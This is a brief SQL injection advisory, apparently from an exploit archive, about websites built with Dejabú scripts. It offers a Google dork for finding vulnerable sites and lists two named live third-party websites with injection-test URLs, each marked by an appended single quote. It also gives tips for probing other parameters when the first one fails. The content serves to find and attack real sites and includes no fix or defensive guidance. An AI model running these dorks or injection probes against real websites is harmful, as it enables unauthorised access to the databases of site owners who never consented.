#############################################################
# Application Name : SQLi in Dejabú's Scripts
# Vulnerable Type : SQL İnjection
# Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id=
# Author: fl3xpl0it a.k.a KurokoTetsuya
# Date: 20.02.2017
# Tested On Demo Sites:
[+] http://www.cepaproduccion.com/content/news.php?id=1114'
[+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2
# Warning: If you not found SQLi , you try SQLi other parameter.
# Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi)
# Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected)
#############################################################